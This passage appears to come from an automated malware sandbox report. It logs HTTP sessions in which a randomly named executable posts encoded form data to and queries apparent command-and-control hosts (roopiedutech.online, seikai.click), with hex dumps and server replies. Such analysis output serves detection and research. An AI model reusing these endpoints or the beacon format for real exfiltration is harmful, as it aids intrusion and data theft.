                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 6b 75 73 62 56 4a 79 37 6b 4e 55 65 49 6b 6a 37 48 37 6b 2f 65 48 62 54 74 78 59 67 76 33 4d 79 46 51 4d 4b 4f 44 70 77 4f 38 70 2b 31 74 76 73 69 44 74 6a 57 30 75 58 75 73 39 68 78 59 6a 78 43 78 63 62 51 51 55 45 6d 63 6e 72 6a 41 2b 45 2b 6f 72 51 45 49 4e 62 6a 76 77 36 66 30 31 68 4d 4c 48 51 52 58 30 49 57 50 2f 57 4f 33 71 54 31 73 5a 6a 57 39 62 30 6a 4a 6a 46 4f 59 41 49 33 43 4d 31 76 79 64 75 73 49 47 34 62 78 65 4f 33 38 62 52 46 37 49 34 59 46 6b 79 47 67 72 44 67 6e 57 76 4d 72 4a 44 45 67 53 4e 75 34 2b 4a 48 67 6f 53 77 45 6f 74 47 77 43 41 46 62 31 6d 4e 68 47 4b 77 4f 36 63 6a 36 53 37 61 4b 36 6b 57 53 78 63 65 32 52 6f 35 50 41 71
                                                                        Data Ascii: N6gPj2W=kusbVJy7kNUeIkj7H7k/eHbTtxYgv3MyFQMKODpwO8p+1tvsiDtjW0uXus9hxYjxCxcbQQUEmcnrjA+E+orQEINbjvw6f01hMLHQRX0IWP/WO3qT1sZjW9b0jJjFOYAI3CM1vydusIG4bxeO38bRF7I4YFkyGgrDgnWvMrJDEgSNu4+JHgoSwEotGwCAFb1mNhGKwO6cj6S7aK6kWSxce2Ro5PAq


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.549999103.191.208.137802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:40.773072958 CET1664OUTPOST /7ozt/ HTTP/1.1
                                                                        Host: www.roopiedutech.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.roopiedutech.online
                                                                        Referer: http://www.roopiedutech.online/7ozt/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 6b 75 73 62 56 4a 79 37 6b 4e 55 65 49 6b 6a 37 48 37 6b 2f 65 48 62 54 74 78 59 67 76 33 4d 79 46 51 4d 4b 4f 44 70 77 4f 38 68 2b 31 66 58 73 6a 6b 35 6a 58 30 75 58 67 4d 39 6b 78 59 69 74 43 77 30 41 51 51 59 79 6d 59 58 72 69 6a 47 45 37 63 33 51 4e 49 4e 62 6d 66 77 37 51 55 31 4f 4d 4c 58 55 52 54 51 49 57 50 2f 57 4f 30 79 54 68 6f 4e 6a 55 39 62 72 30 35 6a 42 66 49 42 64 33 43 55 44 76 79 59 5a 73 37 65 34 61 52 4f 4f 31 50 6a 52 61 4c 49 32 66 46 6c 76 47 67 6d 64 67 6e 62 42 4d 71 38 4c 45 67 61 4e 39 4f 50 58 53 68 49 6d 79 69 4a 49 4b 52 2f 69 55 64 42 36 4d 58 61 70 73 39 65 35 6d 71 53 32 63 50 50 38 63 78 38 76 4e 53 4e 4e 34 4c 52 70 30 47 47 71 53 39 75 56 76 6e 47 69 38 59 59 61 6d 4b 43 32 39 5a 2b 6f 48 5a 37 59 39 4b 38 32 58 49 37 6c 42 47 79 34 49 31 74 70 51 2b 4d 36 56 47 62 2f 5a 4c 74 38 64 37 45 43 72 55 78 41 77 4e 70 6c 38 66 4a 78 53 5a 35 72 41 56 50 35 79 7a 48 69 64 36 6b 38 76 44 46 58 64 6b 71 52 4b 58 34 72 30 68 49 53 34 2f 41 35 6d 56 [TRUNCATED]
                                                                        Data Ascii: N6gPj2W=kusbVJy7kNUeIkj7H7k/eHbTtxYgv3MyFQMKODpwO8h+1fXsjk5jX0uXgM9kxYitCw0AQQYymYXrijGE7c3QNINbmfw7QU1OMLXURTQIWP/WO0yThoNjU9br05jBfIBd3CUDvyYZs7e4aROO1PjRaLI2fFlvGgmdgnbBMq8LEgaN9OPXShImyiJIKR/iUdB6MXaps9e5mqS2cPP8cx8vNSNN4LRp0GGqS9uVvnGi8YYamKC29Z+oHZ7Y9K82XI7lBGy4I1tpQ+M6VGb/ZLt8d7ECrUxAwNpl8fJxSZ5rAVP5yzHid6k8vDFXdkqRKX4r0hIS4/A5mVa4Atj8ZpP5XPMhzXF5Oa4H8+nMEcKqoszOT0PRiVvKQJ24183Cuyh8MYk+aSyXYKwwTsbGmY0zgK9XF/BDPHP1x+Vu82hvkG2j0BYWI5URKyBXMYSS5bYnpOVVNx0LEHRnEWa57rrwLnFqRPWKk83cSRddeE2Ak5vo+zNjEEo+5cKHc9yECG/OXgxA6MwPdghbav/jxrMBG6LV6FNxzHPuAPc05mi8ThUafDfwOKoJrB+Zkwg1Clboj02aEh4nSzO53Xygml8DQsol8Hg4zj7C9wpZAVde82ebHerGpyhXSg3IYo56ey0HlmpJPRHGtMxTJg4LLKs/mh6r/MKZYUFsBLJSYehshpjQBfN9SFXjxPgRtm/9VSweBZN0AR1EDmqW1ZyI0Bg/4fpUFoFDYgxruuxmmC61ePO1e2wmAkomey+AwvHvQiAznhI5SmmVN7pYCQLRLfDeHh9CQJEyMI3i55IAdUBghYIT/9kdj5http8T4wGJe3iwdRGFUgDwSJzLon0BXzcg3BjVGCwBg5yN/r7gSkDujlTETjRfKjDrtE7+H3v8gEjcvWM/qeMNoyaGiKsUo4EWpUJsuf5zpA9029p+8QPOgbY70NhSpHEv+2wgh/0xV3WLTzG12IfNpfphF+0hAtab2WPtsS+utAlPY8Hi+fvEEvEv [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.550000103.191.208.137802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:43.312668085 CET362OUTGET /7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMdappGAEB9CQAwJ1/7vpTPOyeunU+wS9pROO2BCMLDVBWEVc4ObTViQoI1sZt/u29nLO6JUpw==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.roopiedutech.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:46.135535955 CET536INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        x-redirect-by: WordPress
                                                                        location: http://roopiedutech.online/7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMdappGAEB9CQAwJ1/7vpTPOyeunU+wS9pROO2BCMLDVBWEVc4ObTViQoI1sZt/u29nLO6JUpw==&yx-=dF9dYX9pQR-xIhFp
                                                                        x-litespeed-cache: miss
                                                                        content-length: 0
                                                                        date: Thu, 07 Nov 2024 09:11:45 GMT
                                                                        server: LiteSpeed
                                                                        vary: User-Agent


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.550001183.90.181.102802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:52.456267118 CET606OUTPOST /c52l/ HTTP/1.1
                                                                        Host: www.seikai.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seikai.click
                                                                        Referer: http://www.seikai.click/c52l/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 50 61 47 53 52 6f 61 34 33 63 2b 4d 69 56 58 6f 68 65 65 44 78 6f 4a 36 72 43 4d 41 34 4c 41 50 48 32 4d 77 6a 41 66 56 45 79 6f 65 70 41 77 63 58 2b 62 46 38 2b 61 66 2b 57 4d 32 61 71 72 51 73 58 35 31 72 45 5a 46 4e 74 39 49 41 6b 41 70 48 6b 4f 4d 7a 6d 52 56 78 30 53 31 74 49 32 36 4f 38 79 5a 78 61 6e 53 75 30 36 2f 44 50 71 69 56 4b 6d 2b 73 35 63 6d 4d 62 55 64 6e 75 52 54 6a 47 65 6a 61 62 36 44 54 67 4b 4e 70 38 62 7a 32 66 38 57 4d 37 68 53 72 4a 4d 74 67 68 49 61 57 65 36 46 47 6c 42 35 78 4b 67 35 2b 59 52 56 6a 63 7a 57 6d 4d 42 46 48 4e 50 64 43 68 50 70 7a 2f 38 52 77 5a 38 3d
                                                                        Data Ascii: N6gPj2W=PaGSRoa43c+MiVXoheeDxoJ6rCMA4LAPH2MwjAfVEyoepAwcX+bF8+af+WM2aqrQsX51rEZFNt9IAkApHkOMzmRVx0S1tI26O8yZxanSu06/DPqiVKm+s5cmMbUdnuRTjGejab6DTgKNp8bz2f8WM7hSrJMtghIaWe6FGlB5xKg5+YRVjczWmMBFHNPdChPpz/8RwZ8=
                                                                        Nov 7, 2024 10:11:53.500350952 CET1236INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        wpo-cache-status: not cached
                                                                        wpo-cache-message: The request method was not GET (POST)
                                                                        link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"
                                                                        transfer-encoding: chunked
                                                                        content-encoding: br
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 09:11:53 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 34 62 62 65 0d 0a d4 03 17 8a 0c 98 b4 da 1f 12 51 55 fb 61 65 06 60 4d ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 97 81 b1 3b 20 96 ed b8 9e ef 3f 33 b5 fe 1c 55 e5 70 7f 46 b7 2d d2 01 41 90 94 64 9b 0a 9d ec bd ec 71 92 fe 3d b6 2b 05 93 8f 14 6c 10 e0 00 d0 16 85 55 df f6 5f b7 e5 76 d0 6c ff ab 5a 56 cf 34 d5 7f a6 83 b0 0b 70 f1 11 98 e4 9c f7 5c 65 90 00 29 78 48 82 07 92 23 ca 7a 72 aa 2e b5 57 c7 fc fa d4 15 8e 9d 2f 55 fd af fe d7 54 37 6c 5c 79 86 00 18 1b 36 dd 4d 9f bb 90 aa ab 4c 40 21 3e 2a db 0a 99 56 a6 24 9b b2 4d 25 bb 2b 96 00 c8 ff 6b ce ff 35 6c 56 f7 cf 2f e4 15 41 46 4d 3a bf d7 5d 27 71 a2 a4 80 47 f9 a5 0b a6 56 4c 37 a5 96 dd 62 1c 66 bc 54 2d 6b aa a9 f6 f7 03 80 21 8e 47 d9 59 7c 7c 88 79 45 2c 25 78 c0 60 00 d2 44 3a a4 e9 73 d3 b9 77 57 7b fe 68 f9 da c7 7f 88 70 e9 1d 20 91 a5 e8 2f ed a2 4b 2c a0 88 22 fb a8 42 83 79 01 c8 96 c0 53 00 4f d2 0f 92 65 20 59 02 4e d5 d5 61 e6 cd 7b 92 9f 25 7b 95 6c 7f 39 6e 48 92 2d 67 f9 92 bc de 1f b2 bd 97 d9 ed 11 14 37 84 4c 2f [TRUNCATED]
                                                                        Data Ascii: 4bbeQUae`MPH`?; ?3UpF-Adq=+lU_vlZV4p\e)xH#zr.W/UT7l\y6ML@!>*V$M%+k5lV/AFM:]'qGVL7bfT-k!GY||yE,%x`D:swW{hp /K,"BySOe YNa{%{l9nH-g7L/.e?<?@OgM.WfFz/cXx>fGu+T*]Xn-<jvQD<j&cCfWk!bL0~:"Acc4Bbz26h8gUW]ZKq=}AvP)BYw\),yqPwRm<_d'=t`:/[+XJ?U1y8y""!D0syp~4,:GMQTRU{K/c'Q)omog{O?m{{?^!W\J\r~aAc]:y[
                                                                        Nov 7, 2024 10:11:53.500375986 CET212INData Raw: e4 ca 19 b6 22 3a 35 fe 10 39 de 90 87 65 1e 59 79 92 13 32 62 b4 9d 98 b1 0d a1 e4 61 ec fb 9f 9f 6e c8 43 bf ee 90 e4 e4 6b bc 38 91 1e 09 25 0f 65 95 f6 2a 79 1c 3b 94 57 42 b2 ae 0e 3a e3 f7 ae 58 b3 2a 84 92 b9 55 11 2b 84 92 32 7e 91 9c 7c
                                                                        Data Ascii: ":59eYy2banCk8%e*y;WB:X*U+2~|eBI*&y?|YOmq{'?kBw%'HOm~Tb"(6HWx]i_vJx$Wl
                                                                        Nov 7, 2024 10:11:53.500408888 CET1236INData Raw: 7a 6f 7c 2b df 78 b4 ed 1b e7 ad d4 4d 4f 7a 4a be 3d 47 bb 8e a4 ee e6 99 14 bf 64 93 7b 7b 2d d4 1c 4f 3a 2c 65 5d e9 7d 84 92 51 ed 7e 89 17 f8 ed b9 b4 58 91 dc db 39 ee 28 7c 4e 6b 47 7e bb 91 be 3f a7 44 6a 05 74 1e 92 93 4b 41 7a 5a 6e 4b
                                                                        Data Ascii: zo|+xMOzJ=Gd{{-O:,e]}Q~X9(|NkG~?DjtKAzZnK{?7pGhK,=AXx=.k2rqQWZ;Qr%u^;c):K!LJOI&AI1}Ex{c0mYwuI+*va
                                                                        Nov 7, 2024 10:11:53.500612974 CET1236INData Raw: 58 7b a4 81 62 bd 38 34 57 aa 0f 10 5e cd 1d 1d 6e 64 1d 48 d2 8c 7b 7b 52 a6 09 8b 47 c4 5d 5e bd f8 74 6f ef d5 8b 4f 39 10 5b 08 b0 c3 09 f6 56 8f 95 b9 08 49 fe e5 49 67 9c ff 0c 9d 13 0d 06 e4 5e cd 2e 27 bb a8 20 bc 47 02 72 ef d4 12 2f 75
                                                                        Data Ascii: X{b84W^ndH{{RG]^toO9[VIIg^.' Gr/u!k]k9gFP#a8%X;O2DCr-dD%+^w_Y}"h`)]~)h[ >ac|2E8:]Qnn 5`(t+Of}b{{0T
                                                                        Nov 7, 2024 10:11:53.500633001 CET1236INData Raw: 49 ed ba f8 d2 21 bc 27 db 3c 13 fe cc 83 88 4a d1 e5 da f8 20 5f a1 9f 27 13 e6 b5 b4 ce 47 0a bd 47 bb 99 31 cb ad 14 d6 7e fa b1 f5 90 8d b0 0d 1b f1 6b 85 f9 c0 73 f0 c9 5a 1d 9f f9 09 e7 2d 91 1e 36 39 f4 d1 bf 58 ce f8 18 5b 60 09 b6 c0 81
                                                                        Data Ascii: I!'<J _'GG1~ksZ-69X[`ry6]S+ly#RPi()(6>%3T5'iarN>og9"{6{lK%[MVEqPJ4zX;L2y28m[MGj
                                                                        Nov 7, 2024 10:11:53.500644922 CET1236INData Raw: 9d 2b 15 c3 98 ea 69 93 6e f8 32 71 cc 15 a6 cc 3b 1f f6 22 7b 41 68 46 72 8c c6 b4 99 31 1b 5b 6f 85 19 57 9c 80 3b 1f d6 ce 55 4a 4c 1b 46 b4 b2 8e ba 75 f1 c4 7a 25 f2 0e ba 68 4e ec 98 93 b9 e7 8d b7 5f 25 ce 39 2c 27 c7 9a 78 f3 b4 ca 12 25
                                                                        Data Ascii: +in2q;"{AhFr1[oW;UJLFuz%hN_%9,'x%JCOwa[EFSc]4UGg"KChJ$eZ;u>DJS4Q..YsbkLcXck4]e.4rxz1K|
                                                                        Nov 7, 2024 10:11:53.501084089 CET1236INData Raw: 59 d0 df 86 80 c7 12 66 25 c5 42 51 2c 75 56 ac df 84 d0 b3 25 b0 a3 89 03 eb a0 0e 3e ae 43 ce 9f 2f 57 54 48 45 85 78 7a b2 a8 91 a2 e0 54 f0 92 80 e0 5c d8 4d 50 2c 32 02 6a fb b0 2c a8 52 45 a4 94 c1 76 68 cc ac 6d 65 41 a0 78 3c 73 8a 0a 55
                                                                        Data Ascii: Yf%BQ,uV%>C/WTHExzT\MP,2j,REvhmeAx<sU[~j%cy3*dT(#Hb-bZQur*svo$E+KZ R~2M^$zCk_B4Q#|)f9r$7f)4(3P%63J
                                                                        Nov 7, 2024 10:11:53.501096964 CET1236INData Raw: 27 33 d9 eb 91 0e 6d 43 b4 8a d6 c0 f2 6f a5 84 64 62 bb 60 79 bf 36 70 29 45 1b 8e 2f ce 28 36 0e 7b 9c e7 0d cb 25 1a a2 96 1d 2d 08 0e b2 e3 85 24 e6 91 9e b8 99 90 09 a7 0e 51 84 25 35 f2 0f 02 35 be 44 8a e3 06 4a 04 b2 e9 c4 8f de 3a aa 8c
                                                                        Data Ascii: '3mCodb`y6p)E/(6{%-$Q%55DJ:AkwmNtr/ vQSfljofN?@EpV";!ya'f[Y9\N7H@aUS32AkN"b }/RN%r
                                                                        Nov 7, 2024 10:11:53.501110077 CET1236INData Raw: 05 ca a5 cd e5 bb 00 f9 fd fe 23 bf df 10 dd dd ff be 15 f0 be 2e fe eb 21 d8 ab 09 e3 c8 98 76 81 0e 4c b4 31 8c fd 8a 89 5d f5 0a 06 93 b1 6f d1 d0 d2 f1 b2 77 b6 c7 06 b7 c7 bd b3 b1 da e0 f6 7e 9b 3a d8 13 fb d3 04 b2 e7 df fd d8 c5 5d c8 4c
                                                                        Data Ascii: #.!vL1]ow~:]LQ!2hp;L/th'DC0cW_Vw'&l>j:0)Rhs95;OEIFx\k>ORE+Rcle+egz?:Xx
                                                                        Nov 7, 2024 10:11:53.501507044 CET1236INData Raw: 57 98 4c 74 e3 62 48 34 e4 9d 96 58 b0 ff a9 0c b5 73 b7 35 66 0a e3 ec 6f 1d a4 c3 95 46 d2 2d 49 3d 60 99 4b 5d b5 06 e7 a7 b2 ac 21 14 93 f4 8e f4 c7 c6 e0 03 80 2b 73 e0 84 9a 5c 6c 65 c4 7d f2 de cb e8 af 16 d8 be db c8 34 4f f1 d9 96 c0 78
                                                                        Data Ascii: WLtbH4Xs5foF-I=`K]!+s\le}4Ox8n"r\RQ%t~q_/~g_~/W_}n1]~noz{[O@dMmoj{W7_) Ob
                                                                        Nov 7, 2024 10:11:53.505459070 CET1236INData Raw: ae 01 1a 00 2b 0a 5d 77 07 10 b2 37 a2 f9 11 cb ee 2e bc 70 ac 72 99 fa da 96 0b e7 30 7c 64 a5 50 43 97 0e 48 3f cd 9d b7 41 ca bb 15 c7 69 6a 94 e4 30 82 58 33 ec 15 fc 26 38 0c 74 59 bc 6d e3 7a 5c 8f 13 0b 34 05 c3 bc 5b c1 08 01 89 b6 3b 7c
                                                                        Data Ascii: +]w7.pr0|dPCH?Aij0X3&8tYmz\4[;|/g<1ZH\0A B6eJz:Lm1V#*L&qikHdR*<GEK`>k<*N.wujE;p*sS!M8z,U$BpI D


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.550002183.90.181.102802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:55.008482933 CET626OUTPOST /c52l/ HTTP/1.1
                                                                        Host: www.seikai.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seikai.click
                                                                        Referer: http://www.seikai.click/c52l/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 50 61 47 53 52 6f 61 34 33 63 2b 4d 34 30 48 6f 6a 2f 65 44 35 6f 4a 31 75 43 4d 41 78 72 41 44 48 32 41 77 6a 43 75 49 46 41 4d 65 6e 42 41 63 57 2f 62 46 78 65 61 66 77 32 4d 33 58 4b 72 66 73 58 31 48 72 46 6c 46 4e 74 5a 49 41 6e 55 70 45 58 57 4e 70 57 52 54 39 55 53 72 6a 6f 32 36 4f 38 79 5a 78 61 7a 73 75 30 53 2f 44 37 75 69 56 72 6d 35 68 5a 63 6c 4c 62 55 64 6a 75 52 66 6a 47 65 37 61 5a 4f 35 54 69 79 4e 70 34 4c 7a 32 4f 38 56 48 37 68 51 6d 70 4e 75 32 67 31 6c 50 74 2b 6e 46 47 59 74 76 4a 4a 41 32 4f 67 2f 35 2b 37 2b 31 73 74 39 58 65 48 71 54 52 75 41 70 63 73 68 75 4f 70 78 5a 48 59 53 34 30 31 58 34 63 77 2f 52 79 52 52 6b 70 48 57
                                                                        Data Ascii: N6gPj2W=PaGSRoa43c+M40Hoj/eD5oJ1uCMAxrADH2AwjCuIFAMenBAcW/bFxeafw2M3XKrfsX1HrFlFNtZIAnUpEXWNpWRT9USrjo26O8yZxazsu0S/D7uiVrm5hZclLbUdjuRfjGe7aZO5TiyNp4Lz2O8VH7hQmpNu2g1lPt+nFGYtvJJA2Og/5+7+1st9XeHqTRuApcshuOpxZHYS401X4cw/RyRRkpHW
                                                                        Nov 7, 2024 10:11:56.038858891 CET1236INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        wpo-cache-status: not cached
                                                                        wpo-cache-message: The request method was not GET (POST)
                                                                        link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"
                                                                        transfer-encoding: chunked
                                                                        content-encoding: br
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 09:11:55 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 34 62 62 65 0d 0a d4 03 17 8a 0c 98 b4 da 1f 12 51 55 fb 61 65 06 60 4d ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 97 81 b1 3b 20 96 ed b8 9e ef 3f 33 b5 fe 1c 55 e5 70 7f 46 b7 2d d2 01 41 90 94 64 9b 0a 9d ec bd ec 71 92 fe 3d b6 2b 05 93 8f 14 6c 10 e0 00 d0 16 85 55 df f6 5f b7 e5 76 d0 6c ff ab 5a 56 cf 34 d5 7f a6 83 b0 0b 70 f1 11 98 e4 9c f7 5c 65 90 00 29 78 48 82 07 92 23 ca 7a 72 aa 2e b5 57 c7 fc fa d4 15 8e 9d 2f 55 fd af fe d7 54 37 6c 5c 79 86 00 18 1b 36 dd 4d 9f bb 90 aa ab 4c 40 21 3e 2a db 0a 99 56 a6 24 9b b2 4d 25 bb 2b 96 00 c8 ff 6b ce ff 35 6c 56 f7 cf 2f e4 15 41 46 4d 3a bf d7 5d 27 71 a2 a4 80 47 f9 a5 0b a6 56 4c 37 a5 96 dd 62 1c 66 bc 54 2d 6b aa a9 f6 f7 03 80 21 8e 47 d9 59 7c 7c 88 79 45 2c 25 78 c0 60 00 d2 44 3a a4 e9 73 d3 b9 77 57 7b fe 68 f9 da c7 7f 88 70 e9 1d 20 91 a5 e8 2f ed a2 4b 2c a0 88 22 fb a8 42 83 79 01 c8 96 c0 53 00 4f d2 0f 92 65 20 59 02 4e d5 d5 61 e6 cd 7b 92 9f 25 7b 95 6c 7f 39 6e 48 92 2d 67 f9 92 bc de 1f b2 bd 97 d9 ed 11 14 37 84 4c 2f [TRUNCATED]
                                                                        Data Ascii: 4bbeQUae`MPH`?; ?3UpF-Adq=+lU_vlZV4p\e)xH#zr.W/UT7l\y6ML@!>*V$M%+k5lV/AFM:]'qGVL7bfT-k!GY||yE,%x`D:swW{hp /K,"BySOe YNa{%{l9nH-g7L/.e?<?@OgM.WfFz/cXx>fGu+T*]Xn-<jvQD<j&cCfWk!bL0~:"Acc4Bbz26h8gUW]ZKq=}AvP)BYw\),yqPwRm<_d'=t`:/[+XJ?U1y8y""!D0syp~4,:GMQTRU{K/c'Q)omog{O?m{{?^!W\J\r~aAc]:y[
                                                                        Nov 7, 2024 10:11:56.038903952 CET212INData Raw: e4 ca 19 b6 22 3a 35 fe 10 39 de 90 87 65 1e 59 79 92 13 32 62 b4 9d 98 b1 0d a1 e4 61 ec fb 9f 9f 6e c8 43 bf ee 90 e4 e4 6b bc 38 91 1e 09 25 0f 65 95 f6 2a 79 1c 3b 94 57 42 b2 ae 0e 3a e3 f7 ae 58 b3 2a 84 92 b9 55 11 2b 84 92 32 7e 91 9c 7c
                                                                        Data Ascii: ":59eYy2banCk8%e*y;WB:X*U+2~|eBI*&y?|YOmq{'?kBw%'HOm~Tb"(6HWx]i_vJx$Wl
                                                                        Nov 7, 2024 10:11:56.038994074 CET1236INData Raw: 7a 6f 7c 2b df 78 b4 ed 1b e7 ad d4 4d 4f 7a 4a be 3d 47 bb 8e a4 ee e6 99 14 bf 64 93 7b 7b 2d d4 1c 4f 3a 2c 65 5d e9 7d 84 92 51 ed 7e 89 17 f8 ed b9 b4 58 91 dc db 39 ee 28 7c 4e 6b 47 7e bb 91 be 3f a7 44 6a 05 74 1e 92 93 4b 41 7a 5a 6e 4b
                                                                        Data Ascii: zo|+xMOzJ=Gd{{-O:,e]}Q~X9(|NkG~?DjtKAzZnK{?7pGhK,=AXx=.k2rqQWZ;Qr%u^;c):K!LJOI&AI1}Ex{c0mYwuI+*va
                                                                        Nov 7, 2024 10:11:56.039150953 CET1236INData Raw: 58 7b a4 81 62 bd 38 34 57 aa 0f 10 5e cd 1d 1d 6e 64 1d 48 d2 8c 7b 7b 52 a6 09 8b 47 c4 5d 5e bd f8 74 6f ef d5 8b 4f 39 10 5b 08 b0 c3 09 f6 56 8f 95 b9 08 49 fe e5 49 67 9c ff 0c 9d 13 0d 06 e4 5e cd 2e 27 bb a8 20 bc 47 02 72 ef d4 12 2f 75
                                                                        Data Ascii: X{b84W^ndH{{RG]^toO9[VIIg^.' Gr/u!k]k9gFP#a8%X;O2DCr-dD%+^w_Y}"h`)]~)h[ >ac|2E8:]Qnn 5`(t+Of}b{{0T
                                                                        Nov 7, 2024 10:11:56.039170980 CET1236INData Raw: 49 ed ba f8 d2 21 bc 27 db 3c 13 fe cc 83 88 4a d1 e5 da f8 20 5f a1 9f 27 13 e6 b5 b4 ce 47 0a bd 47 bb 99 31 cb ad 14 d6 7e fa b1 f5 90 8d b0 0d 1b f1 6b 85 f9 c0 73 f0 c9 5a 1d 9f f9 09 e7 2d 91 1e 36 39 f4 d1 bf 58 ce f8 18 5b 60 09 b6 c0 81
                                                                        Data Ascii: I!'<J _'GG1~ksZ-69X[`ry6]S+ly#RPi()(6>%3T5'iarN>og9"{6{lK%[MVEqPJ4zX;L2y28m[MGj
                                                                        Nov 7, 2024 10:11:56.039488077 CET1236INData Raw: 9d 2b 15 c3 98 ea 69 93 6e f8 32 71 cc 15 a6 cc 3b 1f f6 22 7b 41 68 46 72 8c c6 b4 99 31 1b 5b 6f 85 19 57 9c 80 3b 1f d6 ce 55 4a 4c 1b 46 b4 b2 8e ba 75 f1 c4 7a 25 f2 0e ba 68 4e ec 98 93 b9 e7 8d b7 5f 25 ce 39 2c 27 c7 9a 78 f3 b4 ca 12 25
                                                                        Data Ascii: +in2q;"{AhFr1[oW;UJLFuz%hN_%9,'x%JCOwa[EFSc]4UGg"KChJ$eZ;u>DJS4Q..YsbkLcXck4]e.4rxz1K|
                                                                        Nov 7, 2024 10:11:56.039495945 CET848INData Raw: 59 d0 df 86 80 c7 12 66 25 c5 42 51 2c 75 56 ac df 84 d0 b3 25 b0 a3 89 03 eb a0 0e 3e ae 43 ce 9f 2f 57 54 48 45 85 78 7a b2 a8 91 a2 e0 54 f0 92 80 e0 5c d8 4d 50 2c 32 02 6a fb b0 2c a8 52 45 a4 94 c1 76 68 cc ac 6d 65 41 a0 78 3c 73 8a 0a 55
                                                                        Data Ascii: Yf%BQ,uV%>C/WTHExzT\MP,2j,REvhmeAx<sU[~j%cy3*dT(#Hb-bZQur*svo$E+KZ R~2M^$zCk_B4Q#|)f9r$7f)4(3P%63J
                                                                        Nov 7, 2024 10:11:56.039511919 CET1236INData Raw: 16 c6 8c 99 3c a0 04 ed fe b6 0a 32 c1 bd 0b 34 e0 81 a3 b7 ee 6d 1e 8a e2 6e 7b 61 23 f1 77 ab 83 3d 11 38 43 15 f8 1e 7c c9 e0 60 09 e0 55 31 30 c3 19 9c 8f 8f 60 4b 98 e6 ab 12 4d 95 18 82 a8 6f e0 ba c8 3e 14 ca 0b 61 df 28 56 74 93 3d 0c 23
                                                                        Data Ascii: <24mn{a#w=8C|`U10`KMo>a(Vt=#J"vHy9OAwBc`I8U;a*V8?T78qImc@eig $r981d6A^anenxXv>/g/.^ax3e
